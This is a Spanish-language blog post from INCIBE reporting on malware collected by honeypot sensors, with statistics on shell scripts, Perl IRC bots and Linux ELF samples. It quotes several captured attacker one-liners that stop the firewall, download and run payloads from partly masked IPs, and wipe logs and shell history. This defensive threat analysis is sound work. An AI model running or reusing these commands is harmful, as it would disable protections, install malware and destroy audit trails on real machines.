Inicio / Blog / Obtención de malware mediante el uso de sistemas trampa

Obtención de malware mediante el uso de sistemas trampa

Publicado el 04/08/2015, por Francisco J. Rodríguez (INCIBE)
Obtención de malware mediante el uso de sistemas trampa

En artículos anteriores hemos tratado el uso de honeypots en la detección de incidentes de seguridad y el tipo de información que podíamos obtener mediante su uso. En esta ocasión pondremos el foco de atención en las muestras de malware recolectadas durante los últimos meses.

Los cibercriminales no descansan y continuamente buscan servicios vulnerables publicados en Internet para llevar a cabo sus actividades. Suelen realizar esta tarea de forma automatizada, con el fin de poner a su disposición el mayor número de máquinas vulneradas. Su atención se centra en:

  • Servicios públicos cuyas credenciales son débiles, como son FTP, SSH, RDP o VNC.
  • Servicios publicados que presentan algún tipo de vulnerabilidad, como es el caso de servidores web. Su objetivo es poder distribuir malware entre los usuarios de una web en concreto (XSS) o incluso infectar el propio servidor web (ShellShock).

En gran parte de estos ataques, el cibercriminal descarga algún tipo de malware en la máquina atacada. El origen del malware es la máquina del propio atacante u otra máquina externa y que a su vez también podría ser una máquina previamente vulnerada.

Gracias a nuestros sensores trampa, INCIBE recopila diariamente una gran cantidad de muestras de los distintos servicios expuestos, gracias a lo cual pueden ser analizadas e identificadas obteniendo información muy valiosa de las mismas, como:

  • Origen de los atacantes
  • Origen de los distribuidores de malware
  • URLs de descarga
  • Tipo de muestra
  • Paneles de Control (C&C)

En los últimos meses hemos recopilado un total de 1626 muestras, en los cuales destacan como origen de ataque países como China, Estados Unidos, Canadá y Holanda.

A continuación analizaremos cada uno de los tipos de ficheros recopilados, que tienen relevancia para nuestra investigación:

- ShellScripts: Un 83 % de las muestras recopiladas son scripts en bash que el atacante descarga en la máquina vulnerada, ya sea desde la propia maquina atacante o desde otra máquina:

/etc/init.d/iptables stop; service iptables stop;SuSefirewall2 stop; reSuSefirewall2 stop; wget -c http://61.X.X.X:80/likds;chmod 777 likds;./likds;

/etc/init.d/iptables stop; service iptables stop;SuSefirewall2 stop; reSuSefirewall2 stop; wget -c http://61.X.X.X:80/likds;chmod 777 32ouk;./32ouk;

/etc/init.d/iptables stop; service iptables stop;SuSefirewall2 stop; reSuSefirewall2 stop; wget -c http://61.X.X.X:80/likds;chmod 777 64rth;./64rth;

En este ejemplo, el atacante realiza la parada de los servicios cortafuegos antes de realizar la descarga y posterior ejecución el malware.

cd /tmp && rm -rf dbus.sh && wget -q http://93.X.X.X/mw.pl && perl mw.pl && rm -rf mw.pl && rm -rf /var/log/lastlog && rm -rf .bash_history && history -c

cd /tmp/; wget -q http://93.X.X.X/dbus.sh > /dev/null 2>&1; chmod +x dbus.sh> /dev/null 2>&1 ; ./dbus.sh > /dev/null 2>&1; rm -rf dbus.sh.1; rm -rf /var/log/lastlog; history -c

En este ejemplo, el atacante descarga la muestra y procede al borrado de los logs y a la limpieza del history.

Las muestras descargadas siguen el siguiente esquema:

Estas muestras contienen enlaces a otras máquinas donde se almacena el malware. Estos enlaces no suelen permanecer activos mucho tiempo. Al analizar muestras similares, se observa que el mismo tipo de malware es descargado desde distintas máquinas que lo distribuyen.

Los atacantes no comprueban la arquitectura de la máquina atacada para saber que malware descargar. Por el contrario, descargan el mismo malware compilado para distintas arquitecturas y los ejecutan todos. Así se aseguran que alguno de ellos funcionará. Podemos observar un ejemplo a continuación:

Como hemos comentado, en otras ocasiones el malware es descargado desde la propia maquina atacante haciendo uso de SFTP. Suelen ser ataques no automatizados y realizados por un humano.

Un 20 % por ciento de las muestras no son detectadas por motores antivirus en el momento que se produce la descarga. Es normal que las muestras tarden entre 24 a 72 horas en ser detectadas por los motores antivirus, pero existen otras muestras que tardan incluso más tiempo en detectadas.

- Octec-Stream: Suponen un 11.44% de las muestras descargadas y todas hacen referencia a scripts en Perl catalogados como Trojan.PerlBot. Un alto porcentaje son el mismo tipo de muestra pero con alguna información modificada como son el servidor de control, el nombre de los administradores o el nombre del canal, de un total de 186 muestras, 38 son muestras únicas. Al ser ejecutadas, la maquina vulnerada se conecta a un canal de IRC desde el cual recibe comandos.

Administradores de los canales de IRC Bot

Nombre de los Canales

- Text-Plain: Representan un 11.69% de las muestras recopiladas. Al igual que ocurría con las muestras ShellScript, contienen enlaces a muestras para diferentes arquitecturas, ejecutándose todas en la máquina atacada.

Muestra de comandos ejecutados por atacante y descarga de malware

- Ejecutables (ELF): son un 23.19% de muestras que son descargadas en la máquina vulnerada, ya sea mediante wget, curl, sftp o ssh, desde otros servidores comprometidos o mediante ftp. Se han obtenido un total de 377 ficheros ejecutables, de los cuales 71 son muestras únicas. En el momento de realizar el análisis, un total de 10 muestras no eran detectadas por los motores antivirus.

El 100% de las muestras son ficheros ELF, ejecutables para sistemas Linux. Al tratarse de ataques automatizados, se da el caso que la misma muestras es descargada varias veces en la misma maquina vulnerada desde el mismo origen o desde distintos orígenes. También nos encontramos con variantes de un mismo malware.

La distribución de un mismo tipo de malware se produce durante un espacio de tiempo determinado, tras el cual aparece otro tipo de amenaza que sustituye al anterior.

- Otras campañas detectadas: En algunos casos, los atacantes no descargan malware en la máquina, pero realizan otro tipo de actividades, entre las que destacan:

  • Realización de Ataques Click - Fraud, tratado en artículos anteriores
  • Comprobación de que un equipo vulnerable sigue estando disponible para futuros ataques.
  • Cambios de contraseña de usuarios Root

Etiquetas: